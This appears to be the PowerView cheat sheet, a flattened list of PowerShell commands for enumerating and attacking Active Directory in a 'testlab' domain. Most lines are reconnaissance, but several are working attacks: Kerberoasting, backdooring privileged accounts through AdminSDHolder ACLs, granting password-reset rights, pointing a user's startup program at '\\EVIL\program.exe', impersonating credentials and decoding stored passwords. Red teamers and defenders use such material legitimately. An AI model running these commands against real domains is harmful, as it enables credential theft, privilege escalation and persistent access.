# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 # New function naming schema: # Verbs: # Get : retrieve full raw data sets # Find : ‘find’ specific data entries in a data set # Add : add a new object to a destination # Set : modify a given object # Invoke : lazy catch-all # Nouns: # Verb-Domain* : indicates that LDAP/.NET querying methods are being executed # Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration # Verb-Net* : indicates that Win32 API access is being used under the hood # get all the groups a user is effectively a member of, 'recursing up' using tokenGroups Get-DomainGroup -MemberIdentity # get all the effective members of a group, 'recursing down' Get-DomainGroupMember -Identity "Domain Admins" -Recurse # use an alterate creadential for any function $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainUser -Credential $Cred # retrieve all the computer dns host names a GPP password applies to Get-DomainOU -GPLink '' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} # get all users with passwords changed > 1 year ago, returning sam account names and password last set times $Date = (Get-Date).AddYears(-1).ToFileTime() Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset # all enabled users, returning distinguishednames Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname # all disabled users Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)" Get-DomainUser -UACFilter ACCOUNTDISABLE # all users that require smart card authentication Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" Get-DomainUser -UACFilter SMARTCARD_REQUIRED # all users that *don't* require smart card authentication, only returning sam account names Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname # use multiple identity types for any *-Domain* function 'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff # find all users with an SPN set (likely service accounts) Get-DomainUser -SPN # check for users who don't have kerberos preauthentication set Get-DomainUser -PreauthNotRequired Get-DomainUser -UACFilter DONT_REQ_PREAUTH # find all service accounts in "Domain Admins" Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'} # find users with sidHistory set Get-DomainUser -LDAPFilter '(sidHistory=*)' # find any users/computers with constrained delegation st Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth # enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation $Computers = Get-DomainComputer -Unconstrained $Users = Get-DomainUser -AllowDelegation -AdminCount # return the local *groups* of a remote server Get-NetLocalGroup SERVER.domain.local # return the local group *members* of a remote server using Win32 API methods (faster but less info) Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local # Kerberoast any users in a particular OU with SPNs set Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" # Find-DomainUserLocation == old Invoke-UserHunter # enumerate servers that allow unconstrained Kerberos delegation and show all users logged in Find-DomainUserLocation -ComputerUnconstrained -ShowAll # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation # find all computers in a given OU Get-DomainComputer -SearchBase "ldap://OU=..." # Get the logged on users for all machines in any *server* OU in a particular domain Get-DomainOU -Identity *server* -Domain | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} # enumerate all gobal catalogs in the forest Get-ForestGlobalCatalog # turn a list of computer short names to FQDNs, using a global catalog gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} # enumerate the current domain controller policy $DCPolicy = Get-DomainPolicy -Policy DC $DCPolicy.PrivilegeRights # user privilege rights on the dc... # enumerate the current domain policy $DomainPolicy = Get-DomainPolicy -Policy Domain $DomainPolicy.KerberosPolicy # useful for golden tickets ;) $DomainPolicy.SystemAccess # password age/etc. # enumerate what machines that a particular user/group identity has local admin rights to # Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation Get-DomainGPOUserLocalGroupMapping -Identity # enumerate what machines that a given user in the specified domain has RDP access rights to Get-DomainGPOUserLocalGroupMapping -Identity -Domain -LocalGroup RDP # export a csv of all GPO mappings Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv # use alternate credentials for searching for files on the domain # Find-InterestingDomainShareFile == old Invoke-FileFinder $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential # enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local # grant user 'will' the rights to change 'matt's password Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose # audit the permissions of AdminSDHolder, resolving GUIDs Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') } # find linked DA accounts using name correlation Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} # save a PowerView object to disk for later usage Get-DomainUser | Export-Clixml user.xml $Users = Import-Clixml user.xml # Find any machine accounts in privileged groups Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} # find all policies applied to a current machine Get-DomainGPO -ComputerIdentity windows1.testlab.local # enumerate all groups in a domain that don't have a global scope, returning just group names Get-DomainGroup -GroupScope NotGlobal -Properties name # enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships # query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames $ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname $Domains = @{} $ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) { # extract the domain the foreign user was added to $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' # check if we've already enumerated this domain if (-not $Domains[$ForeignUserDomain]) { $Domains[$ForeignUserDomain] = $True # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))" Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member } } $ForeignMemberships | fl # if running in -sta mode, impersonate another credential a la "runas /netonly" $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Invoke-UserImpersonation -Credential $Cred # ... action Invoke-RevertToSelf # enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier # set the specified property for the given user identity Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose # Set the owner of 'dfm' in the current domain to 'harmj0y' Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') } # check if any user passwords are set $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl